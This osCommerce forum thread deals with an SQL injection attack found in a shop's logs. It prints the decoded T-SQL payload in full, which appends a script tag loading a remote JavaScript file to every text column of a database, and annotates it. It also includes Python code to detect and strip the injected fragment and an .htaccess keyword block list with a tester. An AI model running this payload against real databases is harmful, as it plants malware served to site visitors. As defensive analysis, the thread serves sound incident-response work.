
osCommerce


Strange URL in Logs


Maxwell Smart


I found a rather strange URL in my logs today:

 

/shop/?\';DeCLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D2073797

 

This was actually their landing page.


Ok, so I've managed to figure out that's an SQL injection attack which translates to this:

 

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231or b.xtype=167) OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="hXXp://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="hXXp://sdo.1000mg.cn/csrss/w.js"></script><!--''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor% AS% CHAR(@)

 

Now obviously I'm going to want to check my db for changes but what would I be looking for?


Apparently I should search Google before posting here...

 

The following was taken from http://forum.joomla.org/viewtopic.php?f=43...375661#p1375966

 

This looks like MS SQL Server T-SQL, and the tables it references don't exist in MySQL (which I assume is your back-end database).

DECLARE @T varchar(255),@C varchar(4000) --sets two variables to put your data in

DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231or b.xtype=167) --sets up a cursor to read through all tables and all column names, i.e it retrieves tablename/columnname pairs for all the tables in your data

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C--opens cursor and starts reading the rows one at a time

WHILE(@@FETCH_STATUS=0) BEGIN --loop handling
exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="hXXp://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="hXXp://sdo.1000mg.cn/csrss/w.js"></script><!--''') --updates every column in every table to append a string to the existing data in the column. set ['+@C+']=['+@C+']+''"> pseudocode for this bit is "SET column_contents = column_contents plus something extra". The something extra looks like: "></title><script src="hXXp://sdo.1000mg.cn/csrss/w.js"></script><!--"
(so everything after it will be commented out). He also avoids columns that he's already done.

FETCH NEXT FROM Table_Cursor INTO
@T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor% AS% CHAR(@) --get the next row and do it all again until loop is complete
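The explanation above tells you what the payload does to a database (the same string is appended to every text column of every table), and the earlier question was what to look for afterwards. The following is an added example, not code from this thread or from osCommerce, that does the defensive inverse of the cursor loop: it walks every textual column, reports the cells carrying the appended fragment, and strips it. It uses a constructed in-memory SQLite database as a stand-in; the table and column names (modelled on osCommerce's products_description and configuration tables) and the sample rows are assumptions, on MySQL the column list would come from information_schema.columns instead of PRAGMA table_info, and the marker regex is generalized to match an injected script tag pointing at any host, not only the one in this thread.

```python
import re
import sqlite3

# Marker string from the decoded payload in the post (URL kept defanged as hXXp).
INJECTED_MARKER = '"></title><script src="hXXp://sdo.1000mg.cn/csrss/w.js"></script><!--'

# Generic form of what the payload appends: a closing-title trick, a script tag
# pointing at any host, and an HTML comment opener that hides the rest of the page.
INJECTED_RE = re.compile(r'"></title><script src="[^"]*"></script><!--', re.IGNORECASE)


def text_columns(conn):
    """Yield (table, column) for every textual column, like the payload's cursor does.

    sqlite_master and PRAGMA table_info stand in for sysobjects/syscolumns (MS SQL)
    or information_schema.columns (MySQL).
    """
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table'")]
    for table in tables:
        for _cid, name, col_type, *_rest in conn.execute(f'PRAGMA table_info("{table}")'):
            if any(t in (col_type or "").upper() for t in ("CHAR", "TEXT", "CLOB")):
                yield table, name


def find_infected(conn):
    """Return (table, column, rowid, value) for every cell carrying an injected script tag."""
    hits = []
    for table, col in text_columns(conn):
        sql = f'SELECT rowid, "{col}" FROM "{table}" WHERE "{col}" LIKE ?'
        for rowid, value in conn.execute(sql, ("%</title><script src=%",)):
            if isinstance(value, str) and INJECTED_RE.search(value):
                hits.append((table, col, rowid, value))
    return hits


def clean_infected(conn):
    """Remove every injected fragment in place; returns the number of cells rewritten."""
    fixed = 0
    for table, col, rowid, value in find_infected(conn):
        cleaned = INJECTED_RE.sub("", value)  # handles several stacked fragments too
        conn.execute(f'UPDATE "{table}" SET "{col}" = ? WHERE rowid = ?', (cleaned, rowid))
        fixed += 1
    conn.commit()
    return fixed


def build_sample_db():
    """Constructed in-memory stand-in for an osCommerce database with two tainted cells (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products_description (products_id INTEGER, products_name VARCHAR(64))")
    conn.execute("CREATE TABLE configuration (configuration_key TEXT, configuration_value TEXT)")
    conn.executemany("INSERT INTO products_description VALUES (?, ?)", [
        (1, "Matrox G200 MMS"),
        (2, "Matrox G400" + INJECTED_MARKER),          # a row the cursor loop rewrote
    ])
    conn.executemany("INSERT INTO configuration VALUES (?, ?)", [
        ("STORE_NAME", "My Shop" + INJECTED_MARKER),   # the tainted store-name setting
        ("STORE_OWNER", "Maxwell Smart"),
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    for table, col, rowid, value in find_infected(db):
        print(f"{table}.{col} rowid={rowid}: {value!r}")
    print("cells cleaned:", clean_infected(db))
```

Run the cleanup against a copy of the database first and compare the hit list before and after. A tainted store name is worth checking early: a stray `<script>` and `<!--` in a value printed on every page breaks everything rendered after it, which matches a symptom of images disappearing from product pages.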


3 weeks later...

My site was also hacked. Images were not being displayed when I entered "product_info.php".

It turned out someone had updated the "store name" parameter in the admin to include text similar to the one you have got there. Unfortunately I forgot to copy it before I reset the parameter.

Let me know if you find any solution(s) to block this kind of intrusion.


Sam

 



I got hammered by this 10 times over recently.

Adding this to .htaccess:

RewriteCond %{QUERY_STRING} [^a-z](declare|char|set|cast|convert|delete|drop|exec|meta|script|select|truncate)[^a-z] [NC]
RewriteRule (.*) - [F,L]

should make it stop appearing in your logs... it'll give them a 500 error instead of a 404 or 200 response

(once you serve these twits a proper error they tend to buzz off)
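The RewriteCond above is tested against the raw query string (Apache evaluates QUERY_STRING before URL-decoding, and [NC] makes the match case-insensitive), and a RewriteRule with [F] answers 403 Forbidden. The added example below, which is not code from this thread, reimplements the same pattern in Python so it can be replayed against request lines pulled from a log to see which ones the rule would reject, including a legitimate search that trips it. The sample request targets are constructed; the first is the attack from the first post, cut off at the same point as the log extract there. Note that the rule only sees GET parameters, so anything carried in a POST body passes untouched.

```python
import re

# Same keyword list as the RewriteCond in the post; [NC] becomes re.IGNORECASE.
# Apache evaluates QUERY_STRING before URL-decoding, so "%20", ";" or "(" all
# serve as the non-letter boundary the pattern requires on both sides.
SQL_KEYWORD_RE = re.compile(
    r"[^a-z](declare|char|set|cast|convert|delete|drop|exec|meta|script|select|truncate)[^a-z]",
    re.IGNORECASE,
)


def query_string(request_target):
    """Return the part of a request target after '?', i.e. what Apache exposes as QUERY_STRING."""
    return request_target.partition("?")[2]


def blocked_by_rule(request_target):
    """True if the RewriteCond would match and the RewriteRule would refuse the request with 403."""
    return SQL_KEYWORD_RE.search(query_string(request_target)) is not None


# Constructed request targets; the first is the attack from the first post, truncated
# where the log extract was truncated.
SAMPLE_REQUESTS = [
    "/shop/?\\';DeCLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228",
    "/shop/product_info.php?products_id=28",
    "/shop/index.php?cPath=22&sort=2a",
    "/shop/advanced_search_result.php?keywords=charger",          # "char" inside a word: boundary fails, allowed
    "/shop/advanced_search_result.php?keywords=drop+leaf+table",  # legitimate search tripped by "drop"
]


def triage(request_targets):
    """Map each request target to whether the rule would block it."""
    return [(target, blocked_by_rule(target)) for target in request_targets]


if __name__ == "__main__":
    for target, blocked in triage(SAMPLE_REQUESTS):
        print("403 " if blocked else "pass", target)
```

The "drop leaf table" case shows the cost of a keyword blocklist: any product search or parameter value that happens to contain one of the words as a whole token is refused. Before enabling the rule, replay a day of access-log query strings through `triage` and review what it would have blocked.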

